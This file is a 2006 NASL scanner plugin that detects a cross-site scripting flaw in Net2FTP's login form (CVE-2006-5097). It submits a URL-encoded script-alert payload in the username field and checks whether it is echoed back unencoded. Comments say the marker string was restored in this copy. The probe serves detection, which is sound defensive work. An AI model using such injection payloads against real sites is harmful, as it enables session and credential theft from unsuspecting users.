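##############################################################################
#
#  Net2FTP index.php Cross-Site Scripting Vulnerability
#
#  Copyright: OS2A and it's member companies
#
#  Date Written: 2006/10/05
#
#  $Revision: 1.1 $
#
#  $Log: os2a_net2ftp_xss_601783.nasl,v $
#  Revision 1.1  2006/10/06 12:54:10  ksjayesh
#  To production
#
#
#  Revision 1.1  2006/10/06 05:47:47  shraddha
#  Issue #3088
#
#  ------------------------------------------------------------------------
#  This program was written by OS2A and/or it's member companies and is
#  licensed under the GNU GPL license. Please see below for details. This
#  header contains information regarding licensing terms under the GPL, and
#  information regarding obtaining source code from the Author. Consequently,
#  pursuant to section 3(c) of the GPL, you must accompany the information
#  found in this header with any distribution you make of this Program.
#  ------------------------------------------------------------------------
##############################################################################

# Plugin registration. This branch only declares metadata (id, references,
# family, report text, dependencies, required ports) and exits before any
# network traffic is generated.
if(description)
{
  script_id(601783);
  script_bugtraq_id(20313);
  script_cve_id("CVE-2006-5097");
  script_copyright(english:"Copyright (C) 2006 OS2A");
  script_version("$Revision: 1.1 $");
  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses : XSS");
  script_name(english:"Net2FTP index.php Cross-Site Scripting Vulnerability");
  script_summary(english:"Check for XSS vulnerability in Net2FTP");

  # The report text below is reproduced exactly as found in this copy of the
  # plugin; its original line layout is not recoverable from here.
  desc["english"] = " Overview : This host has Net2FTP installed, which is prone to cross-site scripting attack. This flaw occurs due to improper sanitization of the input passed to the username parameter in index.php. Impact : An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in context of the affected site which may facilitate the theft of cookie-based authentication credentials. Scope of impact is limited to application level. 
Affected Software : Net2FTP versions 0.93 and prior. Affected Platform : Any system running the affected software. Solution : No vendor supplied patch/upgrade is available as of 06 October 2006. Information regarding this issue will be updated once the solution details are available. For updates, http://www.net2ftp.com/homepage/download.html References : http://www.frsirt.com/english/advisories/2006/3890 CVSS Score : CVSS Base Score : 5.2 (AV:R/AC:L/Au:NR/C:P/I:P/A:N/B:I) CVSS Temporal Score : 4.7 Risk factor : Medium";

  script_description(english:desc["english"]);
  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 80);
  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

# Marker the check looks for in the reply: the decoded form of the value that
# is submitted URL-encoded in the username field below. The comparison in this
# copy of the plugin was against an empty string (the literal was apparently
# lost in extraction), so the result no longer depended on whether the
# submitted value was echoed back; the marker is restored here.
xss_marker = '<script>alert("OS2A")</script>';

port = get_http_port(default:80);
if(!port){
  exit(0);
}

# Probe the conventional install path plus every CGI directory known to the
# scanner.
foreach dir (make_list("/net2ftp", cgi_dirs()))
{
  sndReq = http_get(item:string(dir, "/index.php"), port:port);
  rcvRes = http_keepalive_send_recv(port:port, data:sndReq);

  # No reply at all: stop the whole check rather than trying further
  # directories (behaviour kept from the original).
  if(rcvRes == NULL){
    exit(0);
  }

  # Only continue where the page identifies itself as net2ftp, so the POST is
  # never sent to unrelated applications.
  if(egrep(pattern:"Powered by net2ftp", string:rcvRes))
  {
    # Construct HTTP POST request.
    # Two login-form layouts are handled; the presence of the
    # "input_ftpserver" field name in the page selects which set of parameter
    # names is submitted.
    if("input_ftpserver" >< rcvRes){
      postdata = raw_string("input_ftpserver=", get_host_name(),
                            "&input_ftpserverport=21" +
                            "&input_username=%3Cscript" +
                            "%3Ealert%28%22OS2A%22%29%3C" +
                            "%2Fscript%3E&input_password=&" +
                            "input_skin=1&state=browse&" +
                            "state2=main&cookiesetonlogin" +
                            "=yes");
    }
    else{
      postdata = raw_string("ftpserver=", get_host_name(),
                            "&ftpserverport=21&username=" +
                            "%3Cscript%3Ealert%28%22OS2A" +
                            "%22%29%3C%2Fscript%3E&password" +
                            "=&directory=&language=en&skin=" +
                            "india&ftpmode=binary&Login=" +
                            "Login&state=browse&state2=main");
    }

    sndReq = string("POST ", dir, "/index.php HTTP/1.1\r\n",
                    "Host: ", get_host_name(), "\r\n",
                    "Content-Type: application/x-www-form-urlencoded\r\n",
                    "Content-Length:", strlen(postdata), "\r\n",
                    "\r\n",
                    postdata);
    rcvRes = http_keepalive_send_recv(port:port, data:sndReq, bodyonly:1);

    if(rcvRes != NULL)
    {
      # Report only when the marker comes back in the body without HTML
      # encoding. A properly encoding application would return &lt;script&gt;
      # instead and must not be flagged.
      if(xss_marker >< rcvRes){
        security_warning(port);
      }
      # The first net2ftp instance that answers the POST ends the check,
      # whether or not it was flagged.
      exit(0);
    }
  }
}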